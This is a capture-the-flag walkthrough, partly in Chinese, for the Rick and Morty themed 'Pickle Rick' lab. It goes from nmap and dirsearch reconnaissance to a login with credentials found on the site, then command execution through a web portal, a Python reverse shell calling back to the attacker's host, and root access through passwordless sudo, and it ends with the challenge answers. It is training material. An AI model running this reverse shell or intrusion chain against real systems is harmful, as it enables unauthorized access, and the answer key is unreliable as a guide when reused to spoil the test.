Task 1 Pickle Rick
This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
┌──(root㉿kali)-[~]
└─# nmap -sV -T4 -A 10.10.102.220
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-07 04:08 EDT
Nmap scan report for 10.10.102.220
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ea:ab:92:c8:5b:13:fe:8a:e9:09:67:c9:93:f0:dc:22 (RSA)
| 256 4c:ed:3d:e4:8f:97:c7:e3:fc:6b:61:78:3b:fe:2c:37 (ECDSA)
|_ 256 69:c3:2a:5d:2d:cc:08:db:ce:ee:2a:c5:d6:5f:10:13 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/7%OT=22%CT=1%CU=37661%PV=Y%DS=2%DC=T%G=Y%TM=642FCF95
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 281.69 ms 10.11.0.1
2 281.80 ms 10.10.102.220
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.07 seconds
┌──(root㉿kali)-[~]
└─# dirsearch -u 'http://10.10.102.220'
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.102.220/_23-04-07_04-13-43.txt
Error Log: /root/.dirsearch/logs/errors-23-04-07_04-13-43.log
Target: http://10.10.102.220/
[04:13:43] Starting:
[04:13:53] 403 - 299B - /.ht_wsr.txt
[04:13:53] 403 - 302B - /.htaccess.bak1
[04:13:53] 403 - 302B - /.htaccess.orig
[04:13:53] 403 - 304B - /.htaccess.sample
[04:13:53] 403 - 302B - /.htaccess.save
[04:13:53] 403 - 303B - /.htaccess_extra
[04:13:53] 403 - 300B - /.htaccess_sc
[04:13:53] 403 - 302B - /.htaccess_orig
[04:13:53] 403 - 300B - /.htaccessBAK
[04:13:53] 403 - 301B - /.htaccessOLD2
[04:13:53] 403 - 300B - /.htaccessOLD
[04:13:54] 403 - 292B - /.htm
[04:13:54] 403 - 293B - /.html
[04:13:54] 403 - 298B - /.htpasswds
[04:13:54] 403 - 302B - /.htpasswd_test
[04:13:54] 403 - 299B - /.httr-oauth
[04:13:57] 403 - 293B - /.php3
[04:13:57] 403 - 292B - /.php
[04:14:29] 301 - 315B - /assets -> http://10.10.102.220/assets/
[04:14:29] 200 - 2KB - /assets/
[04:14:54] 200 - 1KB - /index.html
[04:15:00] 200 - 882B - /login.php
[04:15:20] 200 - 17B - /robots.txt
[04:15:22] 403 - 302B - /server-status/
[04:15:22] 403 - 301B - /server-status
Task Completed
在/robots.txt下发现了一串字符串Wubbalubbadubdub,首页发现了 Username: R1ckRul3s,login.php是登录页面使用刚刚发现的信息进行登录。
在/portal.php下发现了一个输入框,并且能执行命令,发现环境有python3这里使用python进行反弹shell,终端有些时候的命令终端不允许直接访问,可以使用python虚拟化一个终端来执行命令
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.20.74",7788));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌──(root㉿kali)-[~]
└─# nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.11.20.74] from (UNKNOWN) [10.10.102.220] 48752
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ip-10-10-102-220:/var/www/html$ whoami
whoami
www-data
www-data@ip-10-10-102-220:/var/www/html$ cd /home
cd /home
www-data@ip-10-10-102-220:/home$ ls
ls
rick ubuntu
www-data@ip-10-10-102-220:/home$ cd rick
cd rick
www-data@ip-10-10-102-220:/home/rick$ ls
ls
second ingredients
www-data@ip-10-10-102-220:/home/rick$ cat second\ ingredients
cat second\ ingredients
1 jerry tear
www-data@ip-10-10-102-220:/home/rick$ sudo -l
sudo -l
Matching Defaults entries for www-data on
ip-10-10-102-220.eu-west-1.compute.internal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on
ip-10-10-102-220.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
www-data@ip-10-10-102-220:/home/rick$ sudo bash
sudo bash
root@ip-10-10-102-220:/home/rick# whoami
whoami
root
root@ip-10-10-102-220:/home/rick# cd /root
cld /root
root@ip-10-10-102-220:~# s
ls
3rd.txt snap
root@ip-10-10-102-220:~# ls
ls
3rd.txt snap
root@ip-10-10-102-220:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice
root@ip-10-10-102-220:~#
1.What is the first ingredient Rick needs?
mr. meeseek hair
2.Whats the second ingredient Rick needs?
jerry tear
3.Whats the final ingredient Rick needs?
fleeb juice
评论区